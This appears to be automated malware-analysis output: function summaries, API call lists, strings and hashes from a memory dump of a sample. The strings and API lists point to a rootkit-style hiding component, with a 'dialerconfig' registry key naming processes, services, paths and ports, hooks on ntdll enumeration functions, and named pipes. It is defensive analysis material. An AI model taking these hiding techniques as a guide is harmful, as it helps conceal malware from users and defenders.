8830 2809238aabc 8824->8830 8826 28092389634 _CreateFrameInfo 5 API calls 8825->8826 8828 2809238aa76 8826->8828 8827->8744 8828->8830 8844 280923897fc 8828->8844 8830->8827 8831 2809238a470 11 API calls 8830->8831 8832 28092389ce4 5 API calls Is_bad_exception_allowed 8830->8832 8831->8830 8832->8830 8834 280923894bf 8833->8834 8835 280923894e8 RtlPcToFileHeader 8834->8835 8836 2809238950a RaiseException 8834->8836 8837 28092389500 8835->8837 8836->8752 8837->8836 8839 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8838->8839 8840 2809238a0df 8839->8840 8840->8774 8840->8775 8842 28092389944 __GetUnwindTryBlock RtlLookupFunctionEntry 8841->8842 8843 2809238a11e 8842->8843 8843->8778 8845 28092389634 _CreateFrameInfo 5 API calls 8844->8845 8846 28092389828 8845->8846 8846->8830 9289 28092394dfd 9290 28092389c90 __CxxCallCatchBlock 5 API calls 9289->9290 9296 28092394e10 9290->9296 9291 28092389634 _CreateFrameInfo 5 API calls 9292 28092394e63 9291->9292 9293 28092389634 _CreateFrameInfo 5 API calls 9292->9293 9295 28092394e73 9293->9295 9294 28092389320 __CxxCallCatchBlock 5 API calls 9297 28092394e4f __CxxCallCatchBlock 9294->9297 9296->9294 9296->9297 9297->9291 9298 280923827fc 9300 28092382842 9298->9300 9299 280923828a8 9300->9299 9301 28092383844 StrCmpNIW 9300->9301 9301->9300 8432 2809238f2fc 8433 2809238f31e 8432->8433 8436 2809238f33b 8432->8436 8434 2809238f32c 8433->8434 8433->8436 8435 2809238d6ac __std_exception_copy 5 API calls 8434->8435 8438 2809238f331 8435->8438 8439 28092391af4 8436->8439 8440 28092391b09 8439->8440 8441 28092391b13 8439->8441 8442 2809238ca0c 5 API calls 8440->8442 8443 28092391b18 8441->8443 8444 28092391b1f __std_exception_copy 8441->8444 8445 28092391b11 8442->8445 8446 2809238d744 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 8443->8446 8447 28092391b52 HeapReAlloc 8444->8447 8448 28092391b25 8444->8448 8445->8438 8446->8445 8447->8444 8447->8445 8449 2809238d6ac __std_exception_copy 5 API calls 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-2879589442
• Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction ID: 94c52070c3881526f7593c9bf3c8e51c4cd2171368668e964aaf77fd85e4ae86
• Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
• Instruction Fuzzy Hash: D9710C3E312E10C6EB90AF65E8DA6592364F789F88F00D111EE5E57B6ADF74C498C740
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
• Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction ID: 910cf10088f07d818205b0dc3785495817490d3ddf8d2c7af839f7822f648744
• Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
• Instruction Fuzzy Hash: F5113C2E706B41C2EF949B11E48966962A0F789FC5F44C029EEAD07756EF3DC549CB04
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
• Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction ID: b00891b11345b540f5922887309db12dbb6122afa035a556f0834e5b8cebc8a7
• Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
• Instruction Fuzzy Hash: 06D1787A205B8882DBB0DB06E49935A77B0F78CF84F118116EADD47BA6DF38C555CB40
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
• Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
• Instruction ID: c10e9cb3c1da2138da732a3eaf92537c782f9e8239feff42a9c8eab5142d91eb
• Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
• Instruction Fuzzy Hash: 0402CC3621AB8486EBA0CB55E49535AB7B1F3C8B94F118115FADE87B69DF7CC448CB00
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Virtual$AllocQuery
• String ID:
• API String ID: 31662377-0
• Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
• Instruction ID: 7110fa36dabdce1eb22e901ce66e00e4fe4a513c646c0970f761336d1381bc64
• Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
• Instruction Fuzzy Hash: 65316C2521BA8481EBB0DB15E0DA35E76A4F38CF84F10C525F5DD0AB9ADF7DC1448B04
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
• String ID:
• API String ID: 1683269324-0
• Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction ID: dd9417db42475d693b9046a82abaa77db6dc5fbe5d9c87c4060757cd8a10cd86
• Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
• Instruction Fuzzy Hash: 54111E7961664182FBE09721F9CF3592294A79CF45F50C125F97E49793EFB8C14C8710
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CacheCurrentFlushInstructionProcessProtectVirtual
• String ID:
• API String ID: 3733156554-0
• Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
• Instruction ID: 7ff0bc90c7417ea505ba44d75ec9cd756d9ba22a1f8dffda1187d65e7492569d
• Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
• Instruction Fuzzy Hash: EBF01D2A619B0480D770DB45E48A35AABA0F38CFD4F14C111FADD0BB6ACE38C5888B00
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0000028092381628: GetProcessHeap.KERNEL32 ref: 0000028092381633
  • Part of subcall function 0000028092381628: HeapAlloc.KERNEL32 ref: 0000028092381642
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 00000280923816B2
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 00000280923816DF
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923816F9
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381719
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 0000028092381734
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381754
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 000002809238176F
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 000002809238178F
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923817AA
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 00000280923817CA
• Sleep.KERNEL32 ref: 0000028092381AD7
• SleepEx.KERNEL32 ref: 0000028092381ADD
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923817E5
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381805
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 0000028092381820
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 0000028092381840
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 000002809238185B
  • Part of subcall function 0000028092381628: RegOpenKeyExW.ADVAPI32 ref: 000002809238187B
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 0000028092381896
  • Part of subcall function 0000028092381628: RegCloseKey.ADVAPI32 ref: 00000280923818A0
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: CloseOpen$HeapSleep$AllocProcess
• String ID:
• API String ID: 1534210851-0
• Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction ID: 571647a4fe7cf175e02ab82d363b130e28844f34c49a9e6fb3c918f9ce66d2d9
• Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
• Instruction Fuzzy Hash: 8631106921364141FFD19B2ADACB3A963A5AB4CFD0F04D421EEAD8B297FF24C459C310
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 304 28092383844-2809238384f 305 28092383869-28092383870 304->305 306 28092383851-28092383864 StrCmpNIW 304->306 306->305 307 28092383866 306->307 307->305
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID:
• String ID: dialer
• API String ID: 0-3528709123
• Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
• Instruction ID: 23c2def3e7017a57e0d0a9c06af34614ea317c3275decb7922654cbbafc2f18d
• Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
• Instruction Fuzzy Hash: 99D05E68353209C6FBD4AFA688CE6602350AB0CF44F88C120D92805251EF58898D9B10
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                                                                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                                      • Instruction ID: 8d733604170286cffb0f2c554e6950e1b2005f45819a2a9e3e21b1e0a6316c75
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B1B57A212A9082EBD48F26D88A76963A5F74CF84F04D016FE6D5B796EF34CD48C740
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                                      • Instruction ID: 75b80e033522ba6b35962cddfca1e4b58c22d828bd3a6d63b5f009fc74084ca6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8731507A216B8086EBA0DF60E8853ED7361F789B44F44C42ADA5D47B99EF78C54CC710
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                                      • Instruction ID: af83be6e397a46e77d4b4b82d8c3c5c00ae88e2dcdecc4550d779e7ff93ff614
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C131863A215F8086DBA0DF25E88539E73A0F78DB94F50C125EAAD47B59DF78C149CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                                      • Instruction ID: ad320acbeb40f035ead22dbb47744a96d6391c80115a4a777b7aaf29dfc86251
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F11332A712F0189EB80CF60E89A3A933A4F71DB58F448D21DA7D467A5DF78C199C780
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                                                                      • Instruction ID: 42b84e0865e9c07b727f5a7b9c9cf13b0063dfb274d7a4397b02992aa11e0958
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29975c57d01bdb1e687cc302dc7d7dc5a8663a128fa1f3b93342ad94a271d3ec
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5251C42670179099FB60AB72A88979A7BA1B748F94F14C115FE6C2BB9ADE38C505C700
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                                                                      • Instruction ID: 881a1123346d4f1d855a82eb134a799bc70400ada81a334d4ee8e2ab18b2dbd0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06df2142d5dd0183fd0e01b7d5608ecb5bc0210788fa76ce78b9fbce82fbb0aa
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3F04F756152948EDBE88F29A98771A77A1F3087C0F80C029D69D83E04DA3C80648F04
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                      • String ID: d
                                                                                                                                                                                                      • API String ID: 2005889112-2564639436
                                                                                                                                                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                                      • Instruction ID: 503cf3ea9fcb1b73c0d6a39619e720d223b7728c2ee9f1207ddaf000f18961da
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC514C3A616B84C6EB90DF62E48935A77A1F789FC9F04C125DA5A0772ADF7CC049CB00
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                      • API String ID: 4175298099-1975688563
                                                                                                                                                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                                      • Instruction ID: 6484679db389c6d7e0f3dd3690d7e37080f868fb7835729460b24f184e79c44c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1531746C112A4AE0EBC5FB66EDDB6D46320B74DF44F80D123E47D1A5679E78828DC350
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000002809238CE37
                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CE4C
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CE6D
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CE9A
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CEAB
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CEBC
                                                                                                                                                                                                      • SetLastError.KERNEL32 ref: 000002809238CED7
                                                                                                                                                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF0D
                                                                                                                                                                                                      • FlsSetValue.KERNEL32(?,?,00000001,000002809238ECCC,?,?,?,?,000002809238BF9F,?,?,?,?,?,0000028092387AB0), ref: 000002809238CF2C
• Part of subcall function 000002809238D6CC: HeapAlloc.KERNEL32 ref: 000002809238D721
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF54
• Part of subcall function 000002809238D744: HeapFree.KERNEL32 ref: 000002809238D75A
• Part of subcall function 000002809238D744: GetLastError.KERNEL32 ref: 000002809238D764
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF65
• FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000028092390A6B,?,?,?,000002809239045C,?,?,?,000002809238C84F), ref: 000002809238CF76
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Value$ErrorLast$Heap$AllocFree
• String ID:
• API String ID: 570795689-0
• Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction ID: 46014ec9a305486ebe501d147826e473f3ecfcde2eb19fc67d57a7eee9eb2729
• Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
• Instruction Fuzzy Hash: 87413A2C21324842FBECA73555DF36922825B8CFB0F54CB24F97E5E6E7DE6894098700
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
• API String ID: 2171963597-1373409510
• Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction ID: 737b34abbb822d793e95a8b0942baec510122db952636b9ca102555e3326cb9c
• Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
• Instruction Fuzzy Hash: D3213D3A619740C3EB509B25E59A35973A0F789BE4F50C215EA6D06BA9DFBCC189CF00
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
• String ID: csm$csm$csm
• API String ID: 849930591-393685449
• Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction ID: 9bc5a333917bf80fd968e05934bc567343bc4708580eaa4f1e8f9a2e5a27b964
• Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
• Instruction Fuzzy Hash: 02E1907A6167408AEBA0DF65D48A39D77A0F749B98F10C115FEAD5BB5ACF38C089C700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: AddressFreeLibraryProc
• String ID: api-ms-$ext-ms-
• API String ID: 3013587201-537541572
• Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction ID: 17d4fd8409afe9c248ff9fe60d3c2a89b5829e2bf12111ef7b2ee945664a58ed
• Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
• Instruction Fuzzy Hash: 0A41D82A317A0091FB96DB26A88A7557391F74DFE0F55C126ED2D8B786EF38C44D8300
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction ID: 0d68b02ae67671f857516eecb0848f9714f5d760cf27ad3bd8b0b321f4de517c
• Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
• Instruction Fuzzy Hash: 79417177615B84C6E7A0CF21E48939E77A1F389F98F44C115EA9A0B759DF38C589CB00
Uniqueness
Uniqueness Score: -1.00%

APIs
• FlsGetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D087
• FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0A6
• FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0CE
• FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0DF
• FlsSetValue.KERNEL32(?,?,?,000002809238C7DE,?,?,?,?,?,?,?,?,000002809238CF9D,?,?,00000001), ref: 000002809238D0F0
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Value
• String ID: 1%$Y%
• API String ID: 3702945584-1395475152
• Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction ID: 508e0f7abfabd1e83ed6e9d602a77b852fec6b871bcf21c5731b16c6c3b63ebd
• Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
• Instruction Fuzzy Hash: A811296860624842FBE8B73669DB36962415F8CBA0F54D324F87D5E6EBDE68C40A8300
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
• Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction ID: c59a68f37da5fcd38c13db7e9c43383aab0ea90acc3110028211fabad8b42c56
• Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
• Instruction Fuzzy Hash: 39817E2D60364186FBD4DB6998CB3A96292AB8DF80F14C425F97D4B797EF78C84D8700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000083.00000002.2489519243.0000028092380000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000028092380000, based on PE: true
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
• Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction ID: 53c3d0c237e81dda78ce487c373411d963f88852fce3ba3e19670fa051cc19a3
• Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
• Instruction Fuzzy Hash: 6E31E62A313A40E1EFA1DB02A98A7656794B74CFA0F59C525EE3D0F792DF39D48D8700
Uniqueness
